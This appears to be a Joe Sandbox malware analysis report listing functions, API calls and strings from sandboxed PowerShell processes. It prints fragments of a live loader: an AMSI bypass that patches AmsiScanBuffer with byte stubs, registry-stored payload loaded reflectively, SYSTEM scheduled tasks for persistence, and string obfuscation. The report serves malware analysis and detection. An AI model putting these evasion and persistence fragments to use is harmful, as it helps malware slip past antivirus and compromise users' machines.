HeapFree.KERNEL32 ref: 00000166BE491DAA

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 7010ab51b8642dcd68b1a44e63c629988575e798b40f3b3bf729794b0ec47a51
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: EA11C035B01B80C9EA15CB66AD042A977B1FB89FD0F595124DE8E93725EF39E442C300

Function 00000166BE491264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000166BE49126A
HeapAlloc.KERNEL32 ref: 00000166BE491279
GetProcessHeap.KERNEL32 ref: 00000166BE491293
HeapAlloc.KERNEL32 ref: 00000166BE4912A4

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 1385b4f492e429a80cbdd5666b288bb9fdc7d9de207b08cefe6d08ad4edf924f
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: B4E06D31B41604EAE7148F62DC083A936E2FB88FA5F44D024C90947350EF7E94998B40

Function 00000166BE491000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000166BE491006
HeapAlloc.KERNEL32 ref: 00000166BE491015
GetProcessHeap.KERNEL32 ref: 00000166BE491028
HeapAlloc.KERNEL32 ref: 00000166BE491037

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: bab91b6a2e6472a1b2b6ff6548e82c1fd53ae5d0f954bfdf85b2d1d1306d2bd8
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: FEE01271B51504EBE7189F62DD043A976E2FB8CF65F449034C90947310EE3D9499DB10

Analysis Process: powershell.exePID: 7252, Parent PID: 8084COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 07490AD0 Relevance: 10.4, Strings: 8, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 07490E0D
4'q, xrefs: 07490F47
4'q, xrefs: 07490BB8
4'q, xrefs: 07490E01
$q, xrefs: 07490F26
4'q, xrefs: 07490F3B
$q, xrefs: 07490F1A
4'q, xrefs: 07490BC4

Memory Dump Source

Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q
API String ID: 0-2324301696
Opcode ID: ffb1f42f7aa8b660ba2722d46f1d6ea672e41d78627d4736701b4b8f00421635
Instruction ID: 63e10490ad62f09c4f94161b141b675c20af44425f7966ba9b328940dbb36d05
Opcode Fuzzy Hash: ffb1f42f7aa8b660ba2722d46f1d6ea672e41d78627d4736701b4b8f00421635
Instruction Fuzzy Hash: D2C103B1B0420BCFDF248A6894147EBBFA2AF86210F18C47BD815CB365DB31D992C791

Function 0480A990 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4Lq, xrefs: 0480A9B8

Memory Dump Source

Source File: 0000001F.00000002.1721774955.0000000004800000.00000040.00000001.00020000.00000000.sdmp, Offset: 04800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_4800000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: 4Lq
API String ID: 823142352-2237474892
Opcode ID: 3592a2ddd739dde892bc1809e0314f661537efbc53d3ee6778e20cc39bd15496
Instruction ID: af794c651b9aba074263a7c5dc48ce0d575ef3d23810563b2e637be3ab5157eb
Opcode Fuzzy Hash: 3592a2ddd739dde892bc1809e0314f661537efbc53d3ee6778e20cc39bd15496
Instruction Fuzzy Hash: CA41AB71E003099FDB14DFA9D845B9EFBF0BF48310F148669E919AB380DB74A941CBA5

Function 0480A4C4 Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000003,00000000,00000002,?), ref: 0480AAD2

Memory Dump Source

Source File: 0000001F.00000002.1721774955.0000000004800000.00000040.00000001.00020000.00000000.sdmp, Offset: 04800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_4800000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3913da52d1e640c2372d428d11f83e50bdd4b531c840a2d1a45c87219f5e399b
Instruction ID: ce692a788341fba2a2fce627a7f0d6ed92f1e48e06e6960634ab283b0b91b992
Opcode Fuzzy Hash: 3913da52d1e640c2372d428d11f83e50bdd4b531c840a2d1a45c87219f5e399b
Instruction Fuzzy Hash: A02148B1D003499FCB10CF99C940A9EFBB4FB08310F008129E918A7240C374A950CFA0

Non-executed Functions

Function 07490178 Relevance: 8.0, Strings: 6, Instructions: 474COMMON

Download Yara Rule

Strings

4'q, xrefs: 074905F9
4'q, xrefs: 074905ED
4'q, xrefs: 0749046F
4'q, xrefs: 07490251
4'q, xrefs: 07490479
4'q, xrefs: 07490247

Memory Dump Source

Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-1794337482
Opcode ID: 5a679b4751fe119ba9043cd284dedf8c9a74c743629ebf3f1673563f7ac0fecd
Instruction ID: def2b6e91f5924403d9a218b19356ff1b644d05e7cdaa41248295a94e24cceb0
Opcode Fuzzy Hash: 5a679b4751fe119ba9043cd284dedf8c9a74c743629ebf3f1673563f7ac0fecd
Instruction Fuzzy Hash: FAF1E2B1B043079FDF258A6984117ABBFA2AFC5211F18C47BD945CB361DB31D892C7A1

Function 074900D1 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

4'q, xrefs: 07490147
4'q, xrefs: 0749013B
$q, xrefs: 0749011A
$q, xrefs: 07490126

Memory Dump Source

Source File: 0000001F.00000002.1725886022.0000000007490000.00000040.00000001.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: a0c4e4285151452ba192ba9817f7531b6983961365bec644c154a0645e98f8e4
Instruction ID: a4fbe1a8fed14c740e435206b992b5957f39f05ed63ff3e06ad06177b7f3cdbd
Opcode Fuzzy Hash: a0c4e4285151452ba192ba9817f7531b6983961365bec644c154a0645e98f8e4
Instruction Fuzzy Hash: 8701A72171D3C79FDB2B123928211626FB29FC759072E45EBE481CB3A3D9264D46C3A7

Analysis Process: powershell.exePID: 4092, Parent PID: 7252COMMON

Execution Graph

Execution Coverage:	74.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.7%
Total number of Nodes:	101
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($cnt-svc64), ref: 004011C2
SysAllocString.OLEAUT32(00402234), ref: 004011CC
SysAllocString.OLEAUT32(powershell), ref: 004011D8
SysAllocString.OLEAUT32(?), ref: 004011E0
SysAllocString.OLEAUT32(0040218C), ref: 004011EA
SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
VariantInit.OLEAUT32(?), ref: 00401250
VariantInit.OLEAUT32(?), ref: 004013EA
VariantInit.OLEAUT32(?), ref: 004013F0
VariantInit.OLEAUT32(?), ref: 00401400
CoUninitialize.COMBASE ref: 004014E8
SysFreeString.OLEAUT32(?), ref: 004014FA
SysFreeString.OLEAUT32(00000000), ref: 004014FD
SysFreeString.OLEAUT32(?), ref: 00401502
SysFreeString.OLEAUT32(?), ref: 00401507
SysFreeString.OLEAUT32(?), ref: 0040150C
SysFreeString.OLEAUT32(?), ref: 00401511

Strings

$cnt-svc64, xrefs: 004011C0, 004011C1
powershell, xrefs: 004011D0
$cnt-svc32, xrefs: 004011B6
SYSTEM, xrefs: 004011EC

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
String ID: $cnt-svc32$$cnt-svc64$SYSTEM$powershell
API String ID: 3960698109-2255085552
Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

Function 004017A5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
RegSetValueExW.KERNELBASE(?,$cnt-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In), ref: 004018CB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Part of subcall function 00401674: SysAllocString.OLEAUT32($cnt-svc32), ref: 00401686
Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE

Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

Part of subcall function 004011AD: SysAllocString.OLEAUT32($cnt-svc64), ref: 004011C2
Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250

Part of subcall function 0040151A: SysAllocString.OLEAUT32($cnt-svc64), ref: 0040152C
Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594

Strings

$cnt-svc64, xrefs: 00401835
EXE, xrefs: 004017AB
$cnt-stager, xrefs: 00401810
$cnt-svc32, xrefs: 00401827
SOFTWARE, xrefs: 004017F7

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
String ID: $cnt-stager$$cnt-svc32$$cnt-svc64$EXE$SOFTWARE
API String ID: 2402434814-911656534
Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 1815803762-291530887
Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In), ref: 004018CB
StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Strings

ParameterTypes, xrefs: 004018E4
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
AmsiScanBufferPtr, xrefs: 00401968
NativeMethods, xrefs: 00401908
OldProtect, xrefs: 00401974
AmsiPtr, xrefs: 0040195C
VirtualProtectDelegate, xrefs: 0040192C
LoadLibraryPtr, xrefs: 00401944
TypeBuilder, xrefs: 004018FC
Kernel32Ptr, xrefs: 00401938
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In, xrefs: 004018C5
ReturnType, xrefs: 004018F0
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
LoadLibraryDelegate, xrefs: 00401920
GetProcAddress, xrefs: 00401914
VirtualProtectPtr, xrefs: 00401950
Get-Delegate, xrefs: 004018D8

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: Process$Heap$AllocCurrentWow64
String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
API String ID: 2666690646-1695467183
Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,75DB2EB0,00000000,00402238), ref: 004019F4
HeapAlloc.KERNEL32(00000000), ref: 00401A01
GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
HeapAlloc.KERNEL32(00000000), ref: 00401A1C

Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
StrCatW.SHLWAPI(?,?), ref: 00401AF2
StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
StrCatW.SHLWAPI(00000000,?), ref: 00401B75
StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
HeapFree.KERNEL32(00000000), ref: 00401B93
GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
HeapFree.KERNEL32(00000000), ref: 00401B9C

Strings

'+', xrefs: 00401AFB, 00401B03, 00401B17
'+[Char](, xrefs: 00401ADF
)+', xrefs: 00401AF4

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
String ID: '+'$'+[Char]($)+'
API String ID: 3510167801-3465596256
Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($cnt-svc64), ref: 0040152C
SysAllocString.OLEAUT32(0040218C), ref: 00401538
CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
VariantInit.OLEAUT32(?), ref: 00401594
VariantInit.OLEAUT32(?), ref: 00401609
CoUninitialize.COMBASE ref: 00401659
SysFreeString.OLEAUT32(00000000), ref: 00401666
SysFreeString.OLEAUT32(?), ref: 0040166B

Strings

$cnt-svc64, xrefs: 0040152A, 0040152B
$cnt-svc32, xrefs: 00401520

Memory Dump Source

Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
String ID: $cnt-svc32$$cnt-svc64
API String ID: 2407135876-1154959919
Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($cnt-svc32), ref: 00401686
SysAllocString.OLEAUT32(0040218C), ref: 00401690
CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
VariantInit.OLEAUT32(?), ref: 004016EE
CoUninitialize.COMBASE ref: 0040177A
SysFreeString.OLEAUT32(?), ref: 0040178C
SysFreeString.OLEAUT32(00000000), ref: 0040178F

Strings

$cnt-svc32, xrefs: 0040167A, 00401685

Memory Dump Source

